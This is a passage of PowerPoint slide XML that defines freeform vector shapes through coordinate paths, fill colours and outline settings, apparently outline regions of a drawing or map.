                      <a:pt x="171" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36443" name="Freeform 175"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3249" y="2339"/>
                <a:ext cx="37" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 37"/>
                  <a:gd name="T1" fmla="*/ 8 h 21"/>
                  <a:gd name="T2" fmla="*/ 26 w 37"/>
                  <a:gd name="T3" fmla="*/ 10 h 21"/>
                  <a:gd name="T4" fmla="*/ 28 w 37"/>
                  <a:gd name="T5" fmla="*/ 13 h 21"/>
                  <a:gd name="T6" fmla="*/ 26 w 37"/>
                  <a:gd name="T7" fmla="*/ 13 h 21"/>
                  <a:gd name="T8" fmla="*/ 25 w 37"/>
                  <a:gd name="T9" fmla="*/ 14 h 21"/>
                  <a:gd name="T10" fmla="*/ 25 w 37"/>
                  <a:gd name="T11" fmla="*/ 13 h 21"/>
                  <a:gd name="T12" fmla="*/ 22 w 37"/>
                  <a:gd name="T13" fmla="*/ 13 h 21"/>
                  <a:gd name="T14" fmla="*/ 21 w 37"/>
                  <a:gd name="T15" fmla="*/ 16 h 21"/>
                  <a:gd name="T16" fmla="*/ 16 w 37"/>
                  <a:gd name="T17" fmla="*/ 18 h 21"/>
                  <a:gd name="T18" fmla="*/ 13 w 37"/>
                  <a:gd name="T19" fmla="*/ 19 h 21"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 19 h 21"/>
                  <a:gd name="T22" fmla="*/ 12 w 37"/>
                  <a:gd name="T23" fmla="*/ 21 h 21"/>
                  <a:gd name="T24" fmla="*/ 11 w 37"/>
                  <a:gd name="T25" fmla="*/ 21 h 21"/>
                  <a:gd name="T26" fmla="*/ 10 w 37"/>
                  <a:gd name="T27" fmla="*/ 19 h 21"/>
                  <a:gd name="T28" fmla="*/ 8 w 37"/>
                  <a:gd name="T29" fmla="*/ 20 h 21"/>
                  <a:gd name="T30" fmla="*/ 4 w 37"/>
                  <a:gd name="T31" fmla="*/ 18 h 21"/>
                  <a:gd name="T32" fmla="*/ 2 w 37"/>
                  <a:gd name="T33" fmla="*/ 18 h 21"/>
                  <a:gd name="T34" fmla="*/ 2 w 37"/>
                  <a:gd name="T35" fmla="*/ 16 h 21"/>
                  <a:gd name="T36" fmla="*/ 1 w 37"/>
                  <a:gd name="T37" fmla="*/ 15 h 21"/>
                  <a:gd name="T38" fmla="*/ 0 w 37"/>
                  <a:gd name="T39" fmla="*/ 11 h 21"/>
                  <a:gd name="T40" fmla="*/ 1 w 37"/>
                  <a:gd name="T41" fmla="*/ 11 h 21"/>
                  <a:gd name="T42" fmla="*/ 2 w 37"/>
                  <a:gd name="T43" fmla="*/ 12 h 21"/>
                  <a:gd name="T44" fmla="*/ 3 w 37"/>
                  <a:gd name="T45" fmla="*/ 12 h 21"/>
                  <a:gd name="T46" fmla="*/ 6 w 37"/>
                  <a:gd name="T47" fmla="*/ 9 h 21"/>
                  <a:gd name="T48" fmla="*/ 7 w 37"/>
                  <a:gd name="T49" fmla="*/ 9 h 21"/>
                  <a:gd name="T50" fmla="*/ 10 w 37"/>
                  <a:gd name="T51" fmla="*/ 10 h 21"/>
                  <a:gd name="T52" fmla="*/ 10 w 37"/>
                  <a:gd name="T53" fmla="*/ 9 h 21"/>
                  <a:gd name="T54" fmla="*/ 11 w 37"/>
                  <a:gd name="T55" fmla="*/ 7 h 21"/>
                  <a:gd name="T56" fmla="*/ 11 w 37"/>
                  <a:gd name="T57" fmla="*/ 5 h 21"/>
                  <a:gd name="T58" fmla="*/ 15 w 37"/>
                  <a:gd name="T59" fmla="*/ 6 h 21"/>
                  <a:gd name="T60" fmla="*/ 20 w 37"/>
                  <a:gd name="T61" fmla="*/ 6 h 21"/>
                  <a:gd name="T62" fmla="*/ 22 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 21"/>
                  <a:gd name="T64" fmla="*/ 28 w 37"/>
                  <a:gd name="T65" fmla="*/ 4 h 21"/>
                  <a:gd name="T66" fmla="*/ 33 w 37"/>
                  <a:gd name="T67" fmla="*/ 1 h 21"/>
                  <a:gd name="T68" fmla="*/ 37 w 37"/>
                  <a:gd name="T69" fmla="*/ 0 h 21"/>
                  <a:gd name="T70" fmla="*/ 34 w 37"/>
                  <a:gd name="T71" fmla="*/ 2 h 21"/>
                  <a:gd name="T72" fmla="*/ 30 w 37"/>
                  <a:gd name="T73" fmla="*/ 4 h 21"/>
                  <a:gd name="T74" fmla="*/ 26 w 37"/>
                  <a:gd name="T75" fmla="*/ 8 h 21"/>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37"/>
                  <a:gd name="T115" fmla="*/ 0 h 21"/>
                  <a:gd name="T116" fmla="*/ 37 w 37"/>
                  <a:gd name="T117" fmla="*/ 21 h 21"/>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37" h="21">
                    <a:moveTo>
                      <a:pt x="26" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="8"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36444" name="Freeform 176"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3249" y="2339"/>
                <a:ext cx="37" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 26 w 37"/>
                  <a:gd name="T1" fmla="*/ 8 h 21"/>
                  <a:gd name="T2" fmla="*/ 26 w 37"/>
                  <a:gd name="T3" fmla="*/ 10 h 21"/>
                  <a:gd name="T4" fmla="*/ 28 w 37"/>
                  <a:gd name="T5" fmla="*/ 13 h 21"/>
                  <a:gd name="T6" fmla="*/ 26 w 37"/>
                  <a:gd name="T7" fmla="*/ 13 h 21"/>
                  <a:gd name="T8" fmla="*/ 25 w 37"/>
                  <a:gd name="T9" fmla="*/ 14 h 21"/>
                  <a:gd name="T10" fmla="*/ 25 w 37"/>
                  <a:gd name="T11" fmla="*/ 13 h 21"/>
                  <a:gd name="T12" fmla="*/ 22 w 37"/>
                  <a:gd name="T13" fmla="*/ 13 h 21"/>
                  <a:gd name="T14" fmla="*/ 21 w 37"/>
                  <a:gd name="T15" fmla="*/ 16 h 21"/>
                  <a:gd name="T16" fmla="*/ 16 w 37"/>
                  <a:gd name="T17" fmla="*/ 18 h 21"/>
                  <a:gd name="T18" fmla="*/ 13 w 37"/>
                  <a:gd name="T19" fmla="*/ 19 h 21"/>
                  <a:gd name="T20" fmla="*/ 12 w 37"/>
                  <a:gd name="T21" fmla="*/ 19 h 21"/>
                  <a:gd name="T22" fmla="*/ 12 w 37"/>
                  <a:gd name="T23" fmla="*/ 21 h 21"/>
                  <a:gd name="T24" fmla="*/ 11 w 37"/>
                  <a:gd name="T25" fmla="*/ 21 h 21"/>
                  <a:gd name="T26" fmla="*/ 10 w 37"/>
                  <a:gd name="T27" fmla="*/ 19 h 21"/>
                  <a:gd name="T28" fmla="*/ 8 w 37"/>
                  <a:gd name="T29" fmla="*/ 20 h 21"/>
                  <a:gd name="T30" fmla="*/ 4 w 37"/>
                  <a:gd name="T31" fmla="*/ 18 h 21"/>
                  <a:gd name="T32" fmla="*/ 2 w 37"/>
                  <a:gd name="T33" fmla="*/ 18 h 21"/>
                  <a:gd name="T34" fmla="*/ 2 w 37"/>
                  <a:gd name="T35" fmla="*/ 16 h 21"/>
                  <a:gd name="T36" fmla="*/ 1 w 37"/>
                  <a:gd name="T37" fmla="*/ 15 h 21"/>
                  <a:gd name="T38" fmla="*/ 0 w 37"/>
                  <a:gd name="T39" fmla="*/ 11 h 21"/>
                  <a:gd name="T40" fmla="*/ 1 w 37"/>
                  <a:gd name="T41" fmla="*/ 11 h 21"/>
                  <a:gd name="T42" fmla="*/ 2 w 37"/>
                  <a:gd name="T43" fmla="*/ 12 h 21"/>
                  <a:gd name="T44" fmla="*/ 3 w 37"/>
                  <a:gd name="T45" fmla="*/ 12 h 21"/>
                  <a:gd name="T46" fmla="*/ 6 w 37"/>
                  <a:gd name="T47" fmla="*/ 9 h 21"/>
                  <a:gd name="T48" fmla="*/ 7 w 37"/>
                  <a:gd name="T49" fmla="*/ 9 h 21"/>
                  <a:gd name="T50" fmla="*/ 10 w 37"/>
                  <a:gd name="T51" fmla="*/ 10 h 21"/>
                  <a:gd name="T52" fmla="*/ 10 w 37"/>
                  <a:gd name="T53" fmla="*/ 9 h 21"/>
                  <a:gd name="T54" fmla="*/ 11 w 37"/>
                  <a:gd name="T55" fmla="*/ 7 h 21"/>
                  <a:gd name="T56" fmla="*/ 11 w 37"/>
                  <a:gd name="T57" fmla="*/ 5 h 21"/>
                  <a:gd name="T58" fmla="*/ 15 w 37"/>
                  <a:gd name="T59" fmla="*/ 6 h 21"/>
                  <a:gd name="T60" fmla="*/ 20 w 37"/>
                  <a:gd name="T61" fmla="*/ 6 h 21"/>
                  <a:gd name="T62" fmla="*/ 22 w 37"/>
                  <a:gd name="T63" fmla="*/ 6 h 21"/>
                  <a:gd name="T64" fmla="*/ 28 w 37"/>
                  <a:gd name="T65" fmla="*/ 4 h 21"/>
                  <a:gd name="T66" fmla="*/ 33 w 37"/>
                  <a:gd name="T67" fmla="*/ 1 h 21"/>
                  <a:gd name="T68" fmla="*/ 37 w 37"/>
                  <a:gd name="T69" fmla="*/ 0 h 21"/>
                  <a:gd name="T70" fmla="*/ 34 w 37"/>
                  <a:gd name="T71" fmla="*/ 2 h 21"/>
                  <a:gd name="T72" fmla="*/ 30 w 37"/>
                  <a:gd name="T73" fmla="*/ 4 h 21"/>
                  <a:gd name="T74" fmla="*/ 26 w 37"/>
                  <a:gd name="T75" fmla="*/ 8 h 21"/>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37"/>
                  <a:gd name="T115" fmla="*/ 0 h 21"/>
                  <a:gd name="T116" fmla="*/ 37 w 37"/>
                  <a:gd name="T117" fmla="*/ 21 h 21"/>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37" h="21">
                    <a:moveTo>
                      <a:pt x="26" y="8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="26" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="8"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36445" name="Freeform 177"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2782" y="2723"/>
                <a:ext cx="188" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 180 w 188"/>
                  <a:gd name="T1" fmla="*/ 20 h 153"/>
                  <a:gd name="T2" fmla="*/ 186 w 188"/>
                  <a:gd name="T3" fmla="*/ 26 h 153"/>
                  <a:gd name="T4" fmla="*/ 187 w 188"/>
                  <a:gd name="T5" fmla="*/ 38 h 153"/>
                  <a:gd name="T6" fmla="*/ 178 w 188"/>
                  <a:gd name="T7" fmla="*/ 42 h 153"/>
                  <a:gd name="T8" fmla="*/ 168 w 188"/>
                  <a:gd name="T9" fmla="*/ 62 h 153"/>
                  <a:gd name="T10" fmla="*/ 161 w 188"/>
                  <a:gd name="T11" fmla="*/ 70 h 153"/>
                  <a:gd name="T12" fmla="*/ 157 w 188"/>
                  <a:gd name="T13" fmla="*/ 84 h 153"/>
                  <a:gd name="T14" fmla="*/ 150 w 188"/>
                  <a:gd name="T15" fmla="*/ 92 h 153"/>
                  <a:gd name="T16" fmla="*/ 138 w 188"/>
                  <a:gd name="T17" fmla="*/ 116 h 153"/>
                  <a:gd name="T18" fmla="*/ 133 w 188"/>
                  <a:gd name="T19" fmla="*/ 119 h 153"/>
                  <a:gd name="T20" fmla="*/ 119 w 188"/>
                  <a:gd name="T21" fmla="*/ 111 h 153"/>
                  <a:gd name="T22" fmla="*/ 101 w 188"/>
                  <a:gd name="T23" fmla="*/ 126 h 153"/>
                  <a:gd name="T24" fmla="*/ 96 w 188"/>
                  <a:gd name="T25" fmla="*/ 141 h 153"/>
                  <a:gd name="T26" fmla="*/ 90 w 188"/>
                  <a:gd name="T27" fmla="*/ 145 h 153"/>
                  <a:gd name="T28" fmla="*/ 89 w 188"/>
                  <a:gd name="T29" fmla="*/ 147 h 153"/>
                  <a:gd name="T30" fmla="*/ 82 w 188"/>
                  <a:gd name="T31" fmla="*/ 150 h 153"/>
                  <a:gd name="T32" fmla="*/ 69 w 188"/>
                  <a:gd name="T33" fmla="*/ 149 h 153"/>
                  <a:gd name="T34" fmla="*/ 63 w 188"/>
                  <a:gd name="T35" fmla="*/ 152 h 153"/>
                  <a:gd name="T36" fmla="*/ 46 w 188"/>
                  <a:gd name="T37" fmla="*/ 147 h 153"/>
                  <a:gd name="T38" fmla="*/ 42 w 188"/>
                  <a:gd name="T39" fmla="*/ 136 h 153"/>
                  <a:gd name="T40" fmla="*/ 39 w 188"/>
                  <a:gd name="T41" fmla="*/ 131 h 153"/>
                  <a:gd name="T42" fmla="*/ 31 w 188"/>
                  <a:gd name="T43" fmla="*/ 122 h 153"/>
                  <a:gd name="T44" fmla="*/ 20 w 188"/>
                  <a:gd name="T45" fmla="*/ 116 h 153"/>
                  <a:gd name="T46" fmla="*/ 12 w 188"/>
                  <a:gd name="T47" fmla="*/ 119 h 153"/>
                  <a:gd name="T48" fmla="*/ 1 w 188"/>
                  <a:gd name="T49" fmla="*/ 118 h 153"/>
                  <a:gd name="T50" fmla="*/ 1 w 188"/>
                  <a:gd name="T51" fmla="*/ 92 h 153"/>
                  <a:gd name="T52" fmla="*/ 1 w 188"/>
                  <a:gd name="T53" fmla="*/ 80 h 153"/>
                  <a:gd name="T54" fmla="*/ 8 w 188"/>
                  <a:gd name="T55" fmla="*/ 76 h 153"/>
                  <a:gd name="T56" fmla="*/ 8 w 188"/>
                  <a:gd name="T57" fmla="*/ 66 h 153"/>
                  <a:gd name="T58" fmla="*/ 16 w 188"/>
                  <a:gd name="T59" fmla="*/ 57 h 153"/>
                  <a:gd name="T60" fmla="*/ 14 w 188"/>
                  <a:gd name="T61" fmla="*/ 39 h 153"/>
                  <a:gd name="T62" fmla="*/ 16 w 188"/>
                  <a:gd name="T63" fmla="*/ 20 h 153"/>
                  <a:gd name="T64" fmla="*/ 28 w 188"/>
                  <a:gd name="T65" fmla="*/ 2 h 153"/>
                  <a:gd name="T66" fmla="*/ 52 w 188"/>
                  <a:gd name="T67" fmla="*/ 1 h 153"/>
                  <a:gd name="T68" fmla="*/ 67 w 188"/>
                  <a:gd name="T69" fmla="*/ 13 h 153"/>
                  <a:gd name="T70" fmla="*/ 83 w 188"/>
                  <a:gd name="T71" fmla="*/ 8 h 153"/>
                  <a:gd name="T72" fmla="*/ 101 w 188"/>
                  <a:gd name="T73" fmla="*/ 16 h 153"/>
                  <a:gd name="T74" fmla="*/ 114 w 188"/>
                  <a:gd name="T75" fmla="*/ 12 h 153"/>
                  <a:gd name="T76" fmla="*/ 127 w 188"/>
                  <a:gd name="T77" fmla="*/ 7 h 153"/>
                  <a:gd name="T78" fmla="*/ 142 w 188"/>
                  <a:gd name="T79" fmla="*/ 9 h 153"/>
                  <a:gd name="T80" fmla="*/ 153 w 188"/>
                  <a:gd name="T81" fmla="*/ 11 h 153"/>
                  <a:gd name="T82" fmla="*/ 165 w 188"/>
                  <a:gd name="T83" fmla="*/ 3 h 153"/>
                  <a:gd name="T84" fmla="*/ 177 w 188"/>
                  <a:gd name="T85" fmla="*/ 9 h 153"/>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88"/>
                  <a:gd name="T130" fmla="*/ 0 h 153"/>
                  <a:gd name="T131" fmla="*/ 188 w 188"/>
                  <a:gd name="T132" fmla="*/ 153 h 153"/>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88" h="153">
                    <a:moveTo>
                      <a:pt x="180" y="12"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="179" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="62"/>
